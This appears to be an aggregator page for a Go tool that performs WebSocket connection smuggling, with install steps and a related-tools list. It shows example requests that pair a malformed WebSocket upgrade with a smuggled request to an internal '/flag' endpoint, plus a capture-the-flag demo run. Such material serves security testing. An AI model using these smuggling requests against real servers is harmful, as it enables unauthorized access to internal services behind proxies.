hahwul / Websocket Connection Smuggler
websocket-connection-smuggler
Stars: β 40
Programming Languages
go
31211 projects - #10 most used programming language
Projects that are alternatives of or similar to Websocket Connection Smuggler
Jwt Hack
π© jwt-hack is tool for hacking / security testing to JWT. Supported for En/decoding JWT, Generate payload for JWT attack and very fast cracking(dict/brutefoce)
Stars: β 172 (+330%)
Mutual labels: hacking, testing-tools, bugbounty
Redcloud
Automated Red Team Infrastructure deployement using Docker
Stars: β 551 (+1277.5%)
Mutual labels: hacking, bugbounty
Payloadsallthethings
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Stars: β 32,909 (+82172.5%)
Mutual labels: hacking, bugbounty
Reconftw
reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities
Stars: β 974 (+2335%)
Mutual labels: hacking, bugbounty
Brutex
Automatically brute force all services running on a target.
Stars: β 974 (+2335%)
Mutual labels: hacking, bugbounty
Hosthunter
HostHunter a recon tool for discovering hostnames using OSINT techniques.
Stars: β 427 (+967.5%)
Mutual labels: hacking, bugbounty
Xspear
Powerfull XSS Scanning and Parameter analysis tool&gem
Stars: β 583 (+1357.5%)
Mutual labels: hacking, bugbounty
Xxe Injection Payload List
π― XML External Entity (XXE) Injection Payload List
Stars: β 304 (+660%)
Mutual labels: hacking, bugbounty
Sql Injection Payload List
π― SQL Injection Payload List
Stars: β 716 (+1690%)
Mutual labels: hacking, bugbounty
Interlace
Easily turn single threaded command line applications into a fast, multi-threaded application with CIDR and glob support.
Stars: β 760 (+1800%)
Mutual labels: hacking, bugbounty
Offensive Docker
Offensive Docker is an image with the more used offensive tools to create an environment easily and quickly to launch assessment to the targets.
Stars: β 328 (+720%)
Mutual labels: hacking, bugbounty
Security Tools
Collection of small security tools, mostly in Bash and Python. CTFs, Bug Bounty and other stuff.
Stars: β 509 (+1172.5%)
Mutual labels: hacking, bugbounty
Awesome Hacking Lists
εΉ³εΈΈηε°ε₯½ηζΈιhackingε·₯ε
·εε€ι’εζηε·₯ε
·ηιε
Stars: β 311 (+677.5%)
Mutual labels: hacking, bugbounty
Favfreak
Making Favicon.ico based Recon Great again !
Stars: β 564 (+1310%)
Mutual labels: hacking, bugbounty
Privesc
A collection of Windows, Linux and MySQL privilege escalation scripts and exploits.
Stars: β 786 (+1865%)
Mutual labels: hacking, bugbounty
Cloudscraper
CloudScraper: Tool to enumerate targets in search of cloud resources. S3 Buckets, Azure Blobs, Digital Ocean Storage Space.
Stars: β 276 (+590%)
Mutual labels: hacking, bugbounty
Osmedeus
Fully automated offensive security framework for reconnaissance and vulnerability scanning
Stars: β 3,391 (+8377.5%)
Mutual labels: hacking, bugbounty
Security whitepapers
Collection of misc IT Security related whitepapers, presentations, slides - hacking, bug bounty, web application security, XSS, CSRF, SQLi
Stars: β 644 (+1510%)
Mutual labels: hacking, bugbounty
websocket-connection-smuggler
Dependency
$ go get -u github.com/c-bata/go-prompt
Install
$ go get github.com/hahwul/websocket-connection-smuggler
or
$ git clone https://github.com/hahwul/websocket-connection-smuggler
$ cd websocket-connection-smuggler
$ go build
$ ./websocket-connection-smuggler
Usage
1. run wcs(websocket-connection-smuggler)
$ websocket-connection-smuggler
2. set target address(domain or ip address)
$ WCS(...) > set target {your target}
3. is SSL? (default is false)
# HTTPS
$ WCS(...) > set ssl true
# HTTP
$ WCS(...) > set ssl false
4. set original request(o_data)
It used the default editor defined in the environment variables, such as vim and no. If you don't have any special settings, vim is the default.
$ WCS(...) > set o_data
e.g
GET /socket.io/?transport-websocket HTTP/1.1
Host: localhost:80
Sec-WebSocket-Version: 4444
Upgrade: websocket
5. set smuggling reqeust(s_data)
It used the default editor defined in the environment variables, such as vim and no. If you don't have any special settings, vim is the default.
$ WCS(...) > set s_data
e.g
GET /flag HTTP/1.1
Host: localhost:5000
Test to 0ang3el Websocket Smuggling Challenge
___
/ \\
/\\ | . . \\
////\\| ||
//// \\ ___//\
/// \\ \
/// |\\ |
// | \\ \ \
/ | \\ \ \
| \\ / /
| \/ /
---------
WebSocket Connection Smuggler
by @hahwul
WCS(target=>None | ssl=>false ) > set target challenge.0ang3el.tk:80
WCS(target=>challenge.0ang3el.tk:80 | ssl=>false ) > set o_data
WCS(target=>challenge.0ang3el.tk:80 | ssl=>false ) > set s_data
WCS(target=>challenge.0ang3el.tk:80 | ssl=>false ) > send
GET /socket.io/?transport-websocket HTTP/1.1
Host: localhost:80
Sec-WebSocket-Version: 4444
Upgrade: websocket
2019/11/30 03:39:15 HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 49
Date: Fri, 29 Nov 2019 18:39:15 GMT
{"flag": "In 50VI37 rUS5I4 [email protected] DRiNKs YOu!!!"}
gth: 119
Date: Fri, 29 Nov 2019 18:39:14 GMT
οΏ½0{"pingInterval":25000,"pingTimeout":60000,"upgrades":["websocket"],"sid":"5148720e07f240a99e6aa7457f41686f"}οΏ½40
Video on asciinema
Donate
I like coffee! I'm a coffee addict.
Reference
Note that the project description data, including the texts, logos, images, and/or trademarks,
for each open source project belongs to its rightful owner.
If you wish to add or remove any projects, please contact us at [email protected].